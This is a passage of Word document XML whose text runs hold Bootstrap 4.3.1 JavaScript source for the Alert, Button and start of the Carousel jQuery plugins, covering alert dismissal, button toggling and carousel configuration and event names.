    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        rootElement = this._getRootElement(element);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customEvent = this._triggerCloseEvent(rootElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (customEvent.isDefaultPrevented())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this._removeElement(rootElement);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$.removeData(this._element, DATA_KEY);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_proto._getRootElement = function _getRootElement(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var selector = Util.getSelectorFromElement(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var parent = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (selector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        parent = document.querySelector(selector);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(!parent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        parent = $(element).closest("." + ClassName.ALERT)[0];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parent;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_proto._triggerCloseEvent = function _triggerCloseEvent(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var closeEvent = $.Event(Event.CLOSE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(element).trigger(closeEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return closeEvent;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_proto._removeElement = function _removeElement(element)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$(element).removeClass(ClassName.SHOW);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!$(element).hasClass(ClassName.FADE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._destroyElement(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/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transitionDuration = Util.getTransitionDurationFromElement(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(element).one(Util.TRANSITION_END, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return _this._destroyElement(element, event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }).emulateTransitionEnd(transitionDuration);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_proto._destroyElement = function _destroyElement(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      $(element).detach().trigger(Event.CLOSED).remove();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Alert._jQueryInterface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$element = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var data = $element.data(DATA_KEY);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Alert(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $element.data(DATA_KEY,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(config === 'close') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          data[config](this);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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Alert._handleDismiss = function _handleDismiss(alertInstance) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          event.preventDefault();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alertInstance.close(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      };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_createClass(Alert,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Alert;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$(document).on(Event.CLICK_DATA_API, Selector.DISMISS, Alert._handleDismiss(new Alert()));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$.fn[NAME] = Alert._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME].Constructor = Alert;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME] = JQUERY_NO_CONFLICT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Alert._jQueryInterface;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NAME$1 = 'button';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$1 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$1 = 'bs.button';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  var EVENT_KEY$1 = "." + DATA_KEY$1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY$1 = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$1 = $.fn[NAME$1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ClassName$1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE: 'active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    BUTTON: 'btn',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUS: 'focus'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Selector$1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_TOGGLE_CARROT: '[data-toggle^="button"]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_TOGGLE: '[data-toggle="buttons"]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    INPUT: 'input:not([type="hidden"])',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE: '.active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    BUTTON: '.btn'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Event$1 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DATA_API: "click" + EVENT_KEY$1 + DATA_API_KEY$1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUS_BLUR_DATA_API: "focus" + EVENT_KEY$1 + DATA_API_KEY$1 + " " + ("blur" + EVENT_KEY$1 + DATA_API_KEY$1)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Button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Button(element) {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Button.prototype;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_proto.toggle = function toggle() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var triggerChangeEvent = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var addAriaPressed = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var rootElement = $(this._element).closest(Selector$1.DATA_TOGGLE)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (rootElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var input = this._element.querySelector(Selector$1.INPUT);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (input) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (input.type === 'radio') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            if (input.checked &amp;&amp; this._element.classList.contains(ClassName$1.ACTIVE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              triggerChangeEvent = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            } else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              var activeElement = rootElement.querySelector(Selector$1.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              if (activeElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">                $(activeElement).removeClass(ClassName$1.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            }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if (triggerChangeEvent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            if (input.hasAttribute('disabled') || rootElement.hasAttribute('disabled') || input.classList.contains('disabled') || rootElement.classList.contains('disabled')) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">              return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            input.checked = !this._element.classList.contains(ClassName$1.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            $(input).trigger('change');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input.focus();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          addAriaPressed = false;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(addAriaPressed) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._element.setAttribute('aria-pressed', !this._element.classList.contains(ClassName$1.ACTIVE));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(triggerChangeEvent) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(this._element).toggleClass(ClassName$1.ACTIVE);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$.removeData(this._element, DATA_KEY$1);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Button._jQueryInterface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$(this).data(DATA_KEY$1);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Button(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this).data(DATA_KEY$1,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(config === 'toggle') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r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lastRenderedPageBreak/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_createClass(Button,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VERSION$1;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Button;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$(document).on(Event$1.CLICK_DATA_API, Selector$1.DATA_TOGGLE_CARROT, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var button = event.target;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    if (!$(button).hasClass(ClassName$1.BUTTON)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      button = $(button).closest(Selector$1.BUTTON);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Button._jQueryInterface.call($(button), 'toggle');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  }).on(Event$1.FOCUS_BLUR_DATA_API, Selector$1.DATA_TOGGLE_CARROT, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var button = $(event.target).closest(Selector$1.BUTTON)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $(button).toggleClass(ClassName$1.FOCUS, /^focus(in)?$/.test(event.type));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$.fn[NAME$1] = Button._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$1].Constructor = Button;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$1].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$1] = JQUERY_NO_CONFLICT$1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Button._jQueryInterface;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NAME$2 = 'carousel';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$2 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$2 = 'bs.carousel';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$2 = "." + DATA_KEY$2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY$2 = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$2 = $.fn[NAME$2];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ARROW_LEFT_KEYCODE = 37; // KeyboardEvent.which value for left arrow key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ARROW_RIGHT_KEYCODE = 39; // KeyboardEvent.which value for right arrow key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var TOUCHEVENT_COMPAT_WAIT = 500; // Time for mouse compat events to fire after touch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var SWIPE_THRESHOLD = 40;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Default = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    interval: 5000,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    keyboard: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    slide: false,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    pause: 'hover',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    wrap: true,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    touch: true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DefaultType = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    interval: '(number|boolean)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    keyboard: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    slide: '(boolean|string)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    pause: '(string|boolean)',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    wrap: 'boolean',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    touch: 'boolean'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Direction = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NEXT: 'next',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    PREV: 'prev',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LEFT: 'left',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    RIGHT: 'right'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Event$2 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SLIDE: "slide" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SLID: "slid" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    KEYDOWN: "keydown" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSEENTER: "mouseenter" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSELEAVE: "mouseleave" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOUCHSTART: "touchstart" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOUCHMOVE: "touchmove" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TOUCHEND: "touchend" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    POINTERDOWN: "pointerdown" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    POINTERUP: "pointerup" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DRAG_START: "dragstart" + EVENT_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LOAD_DATA_API: "load" + EVENT_KEY$2 + DATA_API_KEY$2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DATA_API: "click" + EVENT_KEY$2 + DATA_API_KEY$2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ClassName$2 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CAROUSEL: 'carousel',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE: 'active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SLIDE: 'slide',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    RIGHT: 'carousel-item-right',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    LEFT: 'carousel-item-left',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NEXT: 'carousel-item-next',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    PREV: 'carousel-item-prev',</w:t>
      </w:r>
    </w:p>
